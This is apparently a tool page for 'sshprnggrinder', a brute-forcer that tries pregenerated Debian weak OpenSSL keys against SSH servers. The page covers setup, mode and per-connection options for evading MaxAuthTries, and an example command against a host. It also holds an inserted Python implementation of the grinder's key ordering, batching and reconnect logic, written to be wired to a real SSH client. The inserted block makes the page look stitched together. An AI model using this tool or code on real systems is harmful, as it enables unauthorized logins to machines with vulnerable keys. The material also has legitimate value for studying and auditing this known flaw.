sshprnggrinder

Info

You must have seen the Debian OpenSSL PRNG vulnerability; if not, more details can be found below. Briefly: a Debian package maintainer removed a couple of lines from the OpenSSL random number generator because they made the Valgrind and Purify tools warn about the use of uninitialised data in anything linked against OpenSSL. Without those lines the PRNG was seeded with little more than the process ID, so the keys generated on affected Debian (and Debian-derived) systems were not very random at all: for a given key type and size there are only a few tens of thousands of possible keys, one per PID. HD Moore has an excellent write-up of the issue and has done some research into the vuln. In short, every possible key can be pre-generated, which HD Moore has kindly done, and that means a target can be brute-forced by trying each pre-generated private key in turn until one authenticates, which is what this console tool does.

To use it, download the pre-generated key files for the three key sizes (1024, 2048 and 4096 bit) and put them into three folders named 1024, 2048 and 4096 within the application directory. The reason for this is that the key file names have been pre-cached inside the tool to speed up loading, so it expects exactly those names in those folders rather than waiting for the Windows file system to enumerate the directory at run time.

The mode parameter (-m) selects which key size to test. It defaults to 2 (2048 bit), which is the default key size on Debian. Set it to 0 to test all sizes, in the order 2048, then 1024 and finally 4096; alternatively use 1 for 1024 only, 2 for 2048 only or 4 for 4096 only.

I have also sorted the key file names by PID, an optimisation HD Moore suggests: keys generated at boot time will have PIDs below 200, and keys generated later will generally have PIDs between 500 and 10000, so those ranges are tried first. This should reduce the time taken to find the matching key file.

If you get a message similar to the one below, the server is dropping the connection because too many authentication attempts failed on a single connection (OpenSSH's MaxAuthTries limit). Reduce the number of keys tried per connection using the "-k" parameter:

SSH_MSG_DISCONNECT: 2 Too many authentication failures for root
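The ordering, batching and reconnect logic described above (the -m size order, the PID-priority ordering of the key files, and trying at most -k keys per connection so the server's MaxAuthTries limit does not cut you off) as an added Python example; this is not the sshprnggrinder source. The key file naming scheme (the generating PID as the last '-'-separated field of the file name), the FakeSshd stand-in for the target, and the sample file names are assumptions constructed for the example; a real run would replace the two callbacks with an SSH client library such as paramiko.

```python
"""Ordering, batching and retry logic of a Debian weak-key SSH grinder
(added example, not the sshprnggrinder source)."""
import os
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Assumption: each pregenerated key file carries its generating PID as the
# last '-'-separated field of the file name (e.g. "<hash>-1500").
PID_RE = re.compile(r"-(\d+)$")


class TooManyAuthFailures(Exception):
    """The server sent SSH_MSG_DISCONNECT (reason 2) after too many failures."""


def pid_of(filename: str) -> Optional[int]:
    m = PID_RE.search(filename)
    return int(m.group(1)) if m else None


def pid_priority(pid: Optional[int]) -> Tuple[int, int]:
    """Sort key: boot-time PIDs (<200) first, then the usual daemon range
    (500-10000), then the rest, ascending within each band. Files with no
    PID in the name go last."""
    if pid is None:
        return (3, 0)
    if pid < 200:
        return (0, pid)
    if 500 <= pid <= 10000:
        return (1, pid)
    return (2, pid)


def order_candidates(filenames: Iterable[str]) -> List[str]:
    return sorted(filenames, key=lambda f: pid_priority(pid_of(f)))


def size_order(mode: int) -> List[int]:
    """-m semantics: 0 = 2048, then 1024, then 4096; 1/2/4 = that size only."""
    if mode == 0:
        return [2048, 1024, 4096]
    sizes = {1: 1024, 2: 2048, 4: 4096}
    if mode not in sizes:
        raise ValueError(f"mode must be 0, 1, 2 or 4, got {mode}")
    return [sizes[mode]]


def list_key_files(base_dir: str, size: int) -> List[str]:
    """Private key file names in <base_dir>/<size>/ (public halves dropped)."""
    d = os.path.join(base_dir, str(size))
    return [f for f in os.listdir(d) if not f.endswith(".pub")]


def grind(key_dirs: Dict[int, List[str]], mode: int, keys_per_conn: int,
          connect: Callable[[], object],
          try_key: Callable[[object, str], bool]) -> Dict[str, object]:
    """Try candidate keys size by size, at most keys_per_conn per connection.
    If the server disconnects mid-connection the untried key is retried on a
    fresh connection, so nothing is skipped; disconnects are counted so the
    caller can tell that -k is larger than the server's MaxAuthTries."""
    attempts = connections = disconnects = 0
    for size in size_order(mode):
        queue = order_candidates(key_dirs.get(size, []))
        i = 0
        while i < len(queue):
            session = connect()
            connections += 1
            tried_here = 0
            while i < len(queue) and tried_here < keys_per_conn:
                key = queue[i]
                try:
                    ok = try_key(session, key)
                except TooManyAuthFailures:
                    disconnects += 1
                    if tried_here == 0:
                        raise RuntimeError("disconnected before any key was tried")
                    break  # reconnect and retry queue[i] on the new connection
                attempts += 1
                tried_here += 1
                i += 1
                if ok:
                    return {"size": size, "key": key, "attempts": attempts,
                            "connections": connections, "disconnects": disconnects}
    return {"size": None, "key": None, "attempts": attempts,
            "connections": connections, "disconnects": disconnects}


class FakeSshd:
    """Constructed stand-in for sshd: exactly one key authenticates; after
    max_tries failures on a connection the next attempt is answered with a
    disconnect, as OpenSSH does once MaxAuthTries is exceeded."""
    def __init__(self, good_key: str, max_tries: int = 6):
        self.good_key, self.max_tries = good_key, max_tries

    def connect(self) -> dict:
        return {"failures": 0}

    def try_key(self, session: dict, key: str) -> bool:
        if session["failures"] >= self.max_tries:
            raise TooManyAuthFailures(
                "SSH_MSG_DISCONNECT: 2 Too many authentication failures for root")
        if key == self.good_key:
            return True
        session["failures"] += 1
        return False


# Constructed sample: file names carrying PIDs from each priority band.
SAMPLE_DIRS = {
    2048: ["aa-1500", "bb-150", "cc-20000", "dd-700", "ee-2"],
    1024: ["ff-100"],
}

if __name__ == "__main__":
    srv = FakeSshd("aa-1500", max_tries=6)
    print(grind(SAMPLE_DIRS, 2, 3, srv.connect, srv.try_key))
```

With keys_per_conn no larger than the server's MaxAuthTries (6 by default in OpenSSH) the result shows zero disconnects; if disconnects is non-zero the grinder still finds the key, but every cut connection wastes a reconnect, which is exactly the case where -k should be lowered.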

Features

  • Multi-Threaded
  • Console

Example Usage

sshprnggrinder.exe -h 192.168.0.100 -p 22 -m 2 -v

Requirements

  • Windows 2000, Windows XP, Windows 2003 Server (Might work on others?)
  • Microsoft .NET Framework v3.5
